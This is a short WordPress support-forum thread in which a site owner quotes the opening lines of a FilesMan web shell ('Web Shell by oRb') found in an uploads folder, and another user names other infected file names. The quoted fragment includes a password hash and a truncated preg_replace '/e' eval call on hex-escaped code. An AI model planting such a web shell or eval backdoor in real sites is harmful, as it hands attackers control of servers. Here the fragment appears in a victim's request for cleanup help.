Title: Filesman hack
Last modified: August 22, 2016

---

# Filesman hack

 *  [padwebsite](https://wordpress.org/support/users/padwebsite/)
 * (@padwebsite)
 * [11 years, 7 months ago](https://wordpress.org/support/topic/filesman-hack/)
 * Hi
 * I’ve found an infected file on one of my client websites. The file is wp-content/
   uploads/wp-cron.php and the file begins with the following code:
 * <?php # Web Shell by oRb
    $auth_pass = “bdfa762517dbee605ddea6ac0205b3ec”; $color
   = “#df5”; $default_action = ‘FilesMan’; $default_use_ajax = true; $default_charset
   = ‘Windows-1251’; preg_replace(“/.*/e”,”\x65\x7……
 * I’ve followed all the advice I could find online, I can’t find any base64_decode
   script and this is the only instance there is on my server.
 * I’ve changed all passwords, installed BulletProof security but this file just
   keeps coming back everytime I delete it!
 * None of my other client sites seem to have been infected.
 * Tearing my hair out!! Any advice gratefully received!

Viewing 2 replies - 1 through 2 (of 2 total)

 *  [randytayler](https://wordpress.org/support/users/randytayler/)
 * (@randytayler)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/filesman-hack/#post-5397745)
 * I found the same thing. I think it came from the WP-Symposium plugin, but I can’t
   be sure. I’m terrified it might have come from a plugin I wrote — DrawBlog — 
   but in any case, I’m ripping out files that were modified around the date of 
   the initial installation of this file.
 * I’m finding a ton of files named “security.php” and “footer_front_page.php” —
   them’s bad news.
 *  [randytayler](https://wordpress.org/support/users/randytayler/)
 * (@randytayler)
 * [11 years, 4 months ago](https://wordpress.org/support/topic/filesman-hack/#post-5397746)
 * Oops – I want to be notified of any replies here. Checking the little box now.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Filesman hack’ is closed to new replies.

 * 2 replies
 * 2 participants
 * Last reply from: [randytayler](https://wordpress.org/support/users/randytayler/)
 * Last activity: [11 years, 4 months ago](https://wordpress.org/support/topic/filesman-hack/#post-5397746)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics